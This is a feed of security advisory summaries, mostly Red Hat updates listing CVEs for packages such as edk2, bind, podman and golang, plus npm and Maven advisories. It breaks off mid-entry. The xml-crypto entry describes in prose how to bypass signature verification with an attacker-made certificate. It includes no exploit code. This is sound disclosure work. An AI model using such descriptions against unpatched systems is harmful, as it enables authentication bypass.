30.04.2024 03:00:00 | redhat | [RHSA-2024:2264] edk2 security update (important) | EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Security Fix(es): * edk2: Buffer overflow when handling Server ID option from a DHCPv6 proxy Advertise message (CVE-2023-45235) * EDK2: heap buffer overflow in Tcg2MeasureGptTable() (CVE-2022-36763) * EDK2: heap buffer overflow in Tcg2MeasurePeImage() (CVE-2022-36764) * edk2: Integer underflow when processing IA_NA/IA_TA options in a DHCPv6 Advertise message (CVE-2023-45229) * edk2: Out of Bounds read when handling a ND Redirect message with truncated options (CVE-2023-45231) * edk2: Infinite loop when parsing unknown options in the Destination Options header (CVE-2023-45232) * edk2: Infinite loop when parsing a PadN option in the Destination Options header (CVE-2023-45233) * openssl: Excessive time spent checking DH keys and parameters (CVE-2023-3446) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2264
30.04.2024 03:00:00 | redhat | [RHSA-2024:2565] libreswan security update (moderate) | Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the Internet Protocol Security and uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks such as a virtual private network (VPN). Security Fix(es): * libreswan: Missing PreSharedKey for connection can cause crash (CVE-2024-2357) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2565
30.04.2024 03:00:00 | redhat | [RHSA-2024:2566] pcp security, bug fix, and enhancement update (important) | Performance Co-Pilot (PCP) is a suite of tools, services, and libraries for acquisition, archiving, and analysis of system-level performance measurements. Its light-weight distributed architecture makes it particularly well-suited to centralized analysis of complex systems. Security Fix(es): * pcp: exposure of the redis server backend allows remote command execution via pmproxy (CVE-2024-3019) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2566
30.04.2024 03:00:00 | redhat | [RHSA-2024:2568] grafana security update (moderate) | Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. Security Fix(es): * grafana: golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394) * grafana: vulnerable to authorization bypass (CVE-2024-1313) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2568
30.04.2024 03:00:00 | redhat | [RHSA-2024:2569] grafana-pcp security update (important) | grafana-pcp is an open source Grafana plugin for PCP. Security Fix(es): * grafana-pcp: golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2569
30.04.2024 03:00:00 | redhat | [RHSA-2024:2272] containernetworking-plugins security update (moderate) | The Container Network Interface (CNI) project consists of a specification and libraries for writing plug-ins for configuring network interfaces in Linux containers, along with a number of supported plug-ins. CNI concerns itself only with network connectivity of containers and removing allocated resources when the container is deleted. Security Fix(es): * golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326) * golang: crypto/tls: Timing Side Channel attack in RSA based TLS key exchanges (CVE-2023-45287) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2272
30.04.2024 03:00:00 | redhat | [RHSA-2024:2287] gstreamer1-plugins-bad-free security update (moderate) | GStreamer is a streaming media framework based on graphs of filters which operate on media data. The gstreamer1-plugins-bad-free package contains a collection of plug-ins for GStreamer. Security Fix(es): * gstreamer-plugins-bad: Integer overflow leading to heap overwrite in MXF file handling with uncompressed video (CVE-2023-40474) * gstreamer-plugins-bad: Integer overflow leading to heap overwrite in MXF file handling with AES3 audio (CVE-2023-40475) * gstreamer-plugins-bad: Integer overflow in H.265 video parser leading to stack overwrite (CVE-2023-40476) * gstreamer-plugins-bad-free: buffer overflow vulnerability (CVE-2023-50186) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2287
30.04.2024 03:00:00 | redhat | [RHSA-2024:2289] libtiff security update (moderate) | The libtiff packages contain a library of functions for manipulating Tagged Image File Format (TIFF) files. Security Fix(es): * libtiff: infinite loop via a crafted TIFF file (CVE-2022-40090) * libtiff: segmentation fault in Fax3Encode in libtiff/tif_fax3.c (CVE-2023-3618) * libtiff: integer overflow in tiffcp.c (CVE-2023-40745) * libtiff: potential integer overflow in raw2tiff.c (CVE-2023-41175) * libtiff: heap-based buffer overflow in cpStripToTile() in tools/tiffcp.c (CVE-2023-6228) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2289
30.04.2024 03:00:00 | redhat | [RHSA-2024:2290] mutt security update (moderate) | Mutt is a low resource, highly configurable, text-based MIME e-mail client. Mutt supports most e-mail storing formats, such as mbox and Maildir, as well as most protocols, including POP3 and IMAP. Security Fix(es): * mutt: null pointer dereference (CVE-2023-4874) * mutt: null pointer dereference (CVE-2023-4875) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2290
30.04.2024 03:00:00 | redhat | [RHSA-2024:2292] python3.11 security update (moderate) | Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems. Security Fix(es): * python: Parsing errors in email/_parseaddr.py lead to incorrect value in email address part of tuple (CVE-2023-27043) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2292
30.04.2024 03:00:00 | redhat | [RHSA-2024:2570] gnutls security update (moderate) | The gnutls packages provide the GNU Transport Layer Security (GnuTLS) library, which implements cryptographic algorithms and protocols such as SSL, TLS, and DTLS. Security Fix(es): * gnutls: vulnerable to Minerva side-channel information leak (CVE-2024-28834) * gnutls: potential crash during chain building/verification (CVE-2024-28835) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2570
30.04.2024 03:00:00 | redhat | [RHSA-2024:2295] libjpeg-turbo security update (moderate) | The libjpeg-turbo packages contain a library of functions for manipulating JPEG images. They also contain simple client programs for accessing the libjpeg functions. These packages provide the same functionality and API as libjpeg but with better performance. Security Fix(es): * libjpeg-turbo: heap-buffer-overflow vulnerability in decompress_smooth_data in jdcoefct.c (CVE-2021-29390) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2295
30.04.2024 03:00:00 | redhat | [RHSA-2024:2298] tigervnc security update (important) | Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients. Security Fix(es): * xorg-x11-server: Use-after-free bug in DamageDestroy (CVE-2023-5574) * xorg-x11-server: Use-after-free bug in DestroyWindow (CVE-2023-5380) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2298
30.04.2024 03:00:00 | redhat | [RHSA-2024:2302] gstreamer1-plugins-base security update (moderate) | GStreamer is a streaming media framework based on graphs of filters which operate on media data. The gstreamer1-plugins-base packages contain a collection of well-maintained base plug-ins. Security Fix(es): * gstreamer-plugins-base: heap overwrite in subtitle parsing (CVE-2023-37328) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2302
30.04.2024 03:00:00 | redhat | [RHSA-2024:2303] gstreamer1-plugins-good security update (moderate) | GStreamer is a streaming media framework based on graphs of filters which operate on media data. The gstreamer1-plugins-good packages contain a collection of well-supported plug-ins of good quality and under the LGPL license. Security Fix(es): * gstreamer-plugins-good: integer overflow leading to heap overwrite in FLAC image tag handling (CVE-2023-37327) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2303
30.04.2024 03:00:00 | redhat | [RHSA-2024:2337] python3.11-cryptography security update (moderate) | The python-cryptography packages contain the Python Cryptographic Authority's (PyCA's) cryptography library, which provides cryptographic primitives and recipes to Python developers. Security Fix(es): * python-cryptography: NULL-dereference when loading PKCS7 certificates (CVE-2023-49083) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2337
30.04.2024 03:00:00 | redhat | [RHSA-2024:2348] python-jinja2 security update (moderate) | The python-jinja2 package contains Jinja2, a template engine written in pure Python. Jinja2 provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment. Security Fix(es): * jinja2: HTML attribute injection when passing user input as keys to xmlattr filter (CVE-2024-22195) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2348
30.04.2024 03:00:00 | redhat | [RHSA-2024:2366] freeglut security update (moderate) | freeglut is a completely open source alternative to the OpenGL Utility Toolkit (GLUT) library with an OSI approved free software license. Security Fix(es): * freeglut: memory leak via glutAddSubMenu() function (CVE-2024-24258) * freeglut: memory leak via glutAddMenuEntry() function (CVE-2024-24259) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2366
30.04.2024 03:00:00 | redhat | [RHSA-2024:2368] mod_http2 security update (moderate) | The mod_http2 Apache httpd module implements the HTTP2 protocol (h2+h2c) on top of libnghttp2 for httpd 2.4 servers. Security Fix(es): * httpd: mod_http2: DoS in HTTP/2 with initial window size 0 (CVE-2023-43622) * mod_http2: reset requests exhaust memory (incomplete fix of CVE-2023-44487) (CVE-2023-45802) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2368
30.04.2024 03:00:00 | redhat | [RHSA-2024:2387] mod_jk and mod_proxy_cluster security update (moderate) | The mod_jk module is a plugin for the Apache HTTP Server to connect it with the Apache Tomcat servlet engine. The mod_proxy_cluster module is a plugin for the Apache HTTP Server that provides load-balancer functionality. Security Fix(es): * httpd: Apache Tomcat Connectors (mod_jk) Information Disclosure (CVE-2023-41081) * mod_cluster/mod_proxy_cluster: Stored Cross site Scripting (CVE-2023-6710) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2387
30.04.2024 03:00:00 | redhat | [RHSA-2024:2396] squashfs-tools security update (moderate) | SquashFS is a highly compressed read-only file system for Linux. These packages contain the utilities for manipulating squashfs file systems. Security Fix(es): * squashfs-tools: unvalidated filepaths allow writing outside of destination (CVE-2021-40153) * squashfs-tools: possible Directory Traversal via symbolic link (CVE-2021-41072) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2396
30.04.2024 03:00:00 | redhat | [RHSA-2024:2433] avahi security update (moderate) | Avahi is an implementation of the DNS Service Discovery and Multicast DNS specifications for Zero Configuration Networking. It facilitates service discovery on a local network. Avahi and Avahi-aware applications allow you to plug your computer into a network and, with no configuration, view other people to chat with, view printers to print with, and find shared files on other computers. Security Fix(es): * avahi: Reachable assertion in avahi_dns_packet_append_record (CVE-2023-38469) * avahi: Reachable assertion in avahi_escape_label (CVE-2023-38470) * avahi: Reachable assertion in dbus_set_host_name (CVE-2023-38471) * avahi: Reachable assertion in avahi_rdata_parse (CVE-2023-38472) * avahi: Reachable assertion in avahi_alternative_host_name (CVE-2023-38473) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2433
30.04.2024 03:00:00 | redhat | [RHSA-2024:2447] openssl and openssl-fips-provider security update (low) | OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library. Security Fix(es): * openssl: AES-SIV cipher implementation contains a bug that causes it to ignore empty associated data entries (CVE-2023-2975) * openssl: Excessive time spent checking DH keys and parameters (CVE-2023-3446) * OpenSSL: Excessive time spent checking DH q parameter value (CVE-2023-3817) * openssl: Generating excessively long X9.42 DH keys or checking excessively long X9.42 DH keys or parameters may be very slow (CVE-2023-5678) * openssl: POLY1305 MAC implementation corrupts vector registers on PowerPC (CVE-2023-6129) * openssl: Excessive time spent checking invalid RSA public keys (CVE-2023-6237) * openssl: denial of service via null dereference (CVE-2024-0727) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2447
30.04.2024 03:00:00 | redhat | [RHSA-2024:2456] grub2 security update (moderate) | The grub2 packages provide version 2 of the Grand Unified Boot Loader (GRUB), a highly configurable and customizable boot loader with modular architecture. The packages support a variety of kernel formats, file systems, computer architectures, and hardware devices. Security Fix(es): * grub2: grub2-set-bootflag can be abused by local (pseudo-)users (CVE-2024-1048) * grub2: Out-of-bounds write at fs/ntfs.c may lead to unsigned code execution (CVE-2023-4692) * grub2: out-of-bounds read at fs/ntfs.c (CVE-2023-4693) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2456
30.04.2024 03:00:00 | redhat | [RHSA-2024:2463] systemd security update (moderate) | The systemd packages contain systemd, a system and service manager for Linux, compatible with the SysV and LSB init scripts. It provides aggressive parallelism capabilities, uses socket and D-Bus activation for starting services, offers on-demand starting of daemons, and keeps track of processes using Linux cgroups. In addition, it supports snapshotting and restoring of the system state, maintains mount and automount points, and implements an elaborate transactional dependency-based service control logic. It can also work as a drop-in replacement for sysvinit. Security Fix(es): * systemd-resolved: Unsigned name response in signed zone is not refused when DNSSEC=yes (CVE-2023-7008) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2463
30.04.2024 03:00:00 | redhat | [RHSA-2024:2504] libssh security update (low) | libssh is a library which implements the SSH protocol. It can be used to implement client and server applications. Security Fix(es): * libssh: ProxyCommand/ProxyJump features allow injection of malicious code through hostname (CVE-2023-6004) * libssh: Missing checks for return values for digests (CVE-2023-6918) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2504
30.04.2024 03:00:00 | redhat | [RHSA-2024:2512] file security update (low) | The file command is used to identify a particular file according to the type of data the file contains. It can identify many different file types, including Executable and Linkable Format (ELF) binary files, system libraries, RPM packages, and different graphics formats. Security Fix(es): * file: stack-based buffer over-read in file_copystr in funcs.c (CVE-2022-48554) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2512
30.04.2024 03:00:00 | redhat | [RHSA-2024:2517] wpa_supplicant security update (moderate) | The wpa_supplicant packages contain an 802.1X Supplicant with support for WEP, WPA, WPA2 (IEEE 802.11i / RSN), and various EAP authentication methods. They implement key negotiation with a WPA Authenticator for client stations and control the roaming and IEEE 802.11 authentication and association of the WLAN driver. Security Fix(es): * wpa_supplicant: potential authorization bypass (CVE-2023-52160) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2517
30.04.2024 03:00:00 | redhat | [RHSA-2024:2528] mingw-glib2 security update (low) | GLib provides the core application building blocks for libraries and applications written in C. It provides the core object system used in GNOME, the main loop implementation, and a large set of utility functions for strings and common data structures. Security Fix(es): * glib: GVariant offset table entry size is not checked in is_normal() (CVE-2023-29499) * glib: g_variant_byteswap() can take a long time with some non-normal inputs (CVE-2023-32611) * glib: Timeout in fuzz_variant_text (CVE-2023-32636) * glib: GVariant deserialisation does not match spec for non-normal data (CVE-2023-32665) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2528
30.04.2024 03:00:00 | redhat | [RHSA-2024:2548] podman security and bug fix update (moderate) | The podman tool manages pods, container images, and containers. It is part of the libpod library, which is for applications that use container pods. Container pods are a concept in Kubernetes. Security Fixes: * podman: golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON (CVE-2024-24786) * podman: buildah: full container escape at build time (CVE-2024-1753) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Bug Fixes: * liveness probe not called by podman when using httpGet (JIRA:RHEL-28633) * Unable to copy image from one virtual machine to another using "podman image scp" (JIRA:RHEL-28629) * [v4.9] Backport two docker CLI compatibility fixes (JIRA:RHEL-28636) * Issue in podman causing S2I to fail in overwriting ENTRYPOINT (JIRA:RHEL-14922) * Need to backport podman fix for SIGSEGV in RHEL 9.3/8.9 for UBI based containers (JIRA:RHEL-26843) | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2548
30.04.2024 03:00:00 | redhat | [RHSA-2024:2549] skopeo security and bug fix update (moderate) | The skopeo command lets you inspect images from container image registries, get images and image layers, and use signatures to create and verify files. Security Fix(es): * golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON (CVE-2024-24786) Bug Fix(es): * TRIAGE CVE-2024-24786 skopeo: golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON [rhel-9] - RHEL 9.4 0day (JIRA:RHEL-28235) * skopeo: jose-go: improper handling of highly compressed data [rhel-9] (JIRA:RHEL-28736) | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2549
30.04.2024 03:00:00 | redhat | [RHSA-2024:2551] bind security update (important) | The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly. Security Fix(es): * bind: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868) * bind: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387) * bind: Specific recursive query patterns may lead to an out-of-memory condition (CVE-2023-6516) * bind: Enabling both DNS64 and serve-stale may cause an assertion failure during recursive resolution (CVE-2023-5679) * bind: Querying RFC 1918 reverse zones may cause an assertion failure when "nxdomain-redirect" is enabled (CVE-2023-5517) * bind: Parsing large DNS messages may cause excessive CPU load (CVE-2023-4408) Bug Fix(es): * bind-dyndb-ldap: rebuilt to adapt ABI changes in bind. For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2551
30.04.2024 03:00:00 | redhat | [RHSA-2024:2560] libvirt security and bug fix update (moderate) | The libvirt library contains a C API for managing and interacting with the virtualization capabilities of Linux and other operating systems. In addition, libvirt provides tools for remote management of virtualized systems. Security Fixes: * libvirt: off-by-one error in udevListInterfacesByStatus() (CVE-2024-1441) * libvirt: negative g_new0 length can lead to unbounded memory allocation (CVE-2024-2494) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Bug Fixes: * libvirt: off-by-one error in udevListInterfacesByStatus() [rhel-9] (JIRA:RHEL-25081) * libvirt: negative g_new0 length can lead to unbounded memory allocation [rhel-9] (JIRA:RHEL-29515) | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2560
30.04.2024 03:00:00 | redhat | [RHSA-2024:2562] golang security update (important) | The golang packages provide the Go programming language compiler. Security Fix(es): * golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394) * golang: net/http: memory exhaustion in Request.ParseMultipartForm (CVE-2023-45290) * golang: net/http/cookiejar: incorrect forwarding of sensitive headers and cookies on HTTP redirect (CVE-2023-45289) * golang: crypto/x509: Verify panics on certificates with an unknown public key algorithm (CVE-2024-24783) * golang: net/mail: comments in display names are incorrectly handled (CVE-2024-24784) * golang: html/template: errors returned from MarshalJSON methods may break template escaping (CVE-2024-24785) * golang: net/http, x/net/http2: unlimited number of CONTINUATION frames causes DoS (CVE-2023-45288) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2562
30.04.2024 03:00:00 | redhat | [RHSA-2024:2571] sssd security and bug fix update (moderate) | The System Security Services Daemon (SSSD) service provides a set of daemons to manage access to remote directories and authentication mechanisms. It also provides the Name Service Switch (NSS) and the Pluggable Authentication Modules (PAM) interfaces toward the system, and a pluggable back-end system to connect to multiple different account sources. Security Fix(es): * sssd: Race condition during authorization leads to GPO policies functioning inconsistently (CVE-2023-3758) Bug Fix(es): * socket leak (JIRA:RHEL-22340) * Passkey cannot fall back to password (JIRA:RHEL-28161) * sssd: Race condition during authorization leads to GPO policies functioning inconsistently (JIRA:RHEL-27209) | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2571
30.04.2024 03:00:00redhat[RHSA-2024:2616] tigervnc security update (important)Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.Security Fix(es):* xorg-x11-server: Heap buffer overread/data leakage in ProcXIGetSelectedEvents (CVE-2024-31080)* xorg-x11-server: Heap buffer overread/data leakage in ProcXIPassiveGrabDevice (CVE-2024-31081)* xorg-x11-server: Use-after-free in ProcRenderAddGlyphs (CVE-2024-31083)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2616
01.05.2024 20:05:55npm[NPM:GHSA-2XP3-57P7-QF4V] xml-crypto vulnerable to XML signature verification bypass due improper verification of signature/signature spoofing (critical)### Summary The default configuration does not check the authorization of the signer; it only checks the validity of the signature per section 3.2.2 of https://www.w3.org/TR/2008/REC-xmldsig-core-20080610/#sec-CoreValidation. As such, without additional validation steps, the default configuration allows a malicious actor to re-sign an XML document, place the certificate in a `<KeyInfo />` element, and pass `xml-crypto` default validation checks. ### Details Affected `xml-crypto` versions are `>= 4.0.0` and `< 6.0.0`. `xml-crypto` trusts by default any certificate provided via the digitally signed XML document's `<KeyInfo />`. `xml-crypto` prefers to use any certificate provided via the digitally signed XML document's `<KeyInfo />` even if the library was configured to use a specific certificate (`publicCert`) for signature verification purposes. An attacker can spoof signature verification by modifying the XML document, replacing the existing signature with a signature generated with a malicious private key (created by the attacker), and attaching that private key's certificate to the `<KeyInfo />` element. The vulnerability is a combination of changes introduced in `4.0.0` at * https://github.com/node-saml/xml-crypto/pull/301 * https://github.com/node-saml/xml-crypto/commit/c2b83f984049edb68ad1d7c6ad0739ec92af11ca Changes in that PR provided a default method to extract the certificate from the signed XML document: * https://github.com/node-saml/xml-crypto/blob/c2b83f984049edb68ad1d7c6ad0739ec92af11ca/lib/signed-xml.js#L405-L414 * https://github.com/node-saml/xml-crypto/blob/c2b83f984049edb68ad1d7c6ad0739ec92af11ca/lib/signed-xml.js#L334 and changes in the PR prefer the output of that method to be used as the certificate for signature verification even in the case when the library is configured to use a specific/pre-configured `signingCert`: * https://github.com/node-saml/xml-crypto/blob/c2b83f984049edb68ad1d7c6ad0739ec92af11ca/lib/signed-xml.js#L507 The name of `signingCert` was changed later (but prior to the `4.0.0` release) to `publicCert`: * https://github.com/node-saml/xml-crypto/commit/78329fbae34c9b25ba25882604e960f506d7c0e7 * https://github.com/node-saml/xml-crypto/blob/78329fbae34c9b25ba25882604e960f506d7c0e7/lib/signed-xml.js#L507 The issue was fixed in `6.0.0` by disabling implicit usage of the default `getCertFromKeyInfo` implementation: * https://github.com/node-saml/xml-crypto/pull/445 * https://github.com/node-saml/xml-crypto/commit/21201723d2ca9bc11288f62cf72552b7d659b000 Possible workarounds for versions 4.x and 5.x: - Check the certificate extracted via `getCertFromKeyInfo` against trusted certificates before accepting the results of the validation. - Set `xml-crypto`'s `getCertFromKeyInfo` to `() => undefined`, forcing `xml-crypto` to use an explicitly configured `publicCert` or `privateKey` for signature verification. ### PoC https://github.com/node-saml/xml-crypto/discussions/399 ### Impact An untrusted certificate can be used to pass a malicious XML payload through an improperly configured installation of `xml-crypto`.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2XP3-57P7-QF4V
01.05.2024 19:40:05maven[MAVEN:GHSA-CHFM-68VV-PVW5] XMLUnit for Java has Insecure Defaults when Processing XSLT Stylesheets (low)### Impact When performing XSLT transformations, XMLUnit for Java did not disable XSLT extension functions by default. Depending on the XSLT processor being used, this could allow arbitrary code to be executed when XMLUnit is used to transform data with a stylesheet whose source cannot be trusted. If the stylesheet can be provided externally, this may even lead to remote code execution. ### Patches Users are advised to upgrade to XMLUnit for Java 2.10.0, where the default has been changed by means of https://github.com/xmlunit/xmlunit/commit/b81d48b71dfd2868bdfc30a3e17ff973f32bc15b ### Workarounds XMLUnit's main use-case is performing tests on code that generates or processes XML. Most users will not use it to perform arbitrary XSLT transformations. Users running XSLT transformations with untrusted stylesheets should explicitly use XMLUnit's APIs to pass in a pre-configured TraX `TransformerFactory` with extension functions disabled via features and attributes. The required `setFactory` or `setTransformerFactory` methods have been available since XMLUnit for Java 2.0.0. ### References [Bug Report](https://github.com/xmlunit/xmlunit/issues/264) [JAXP Security 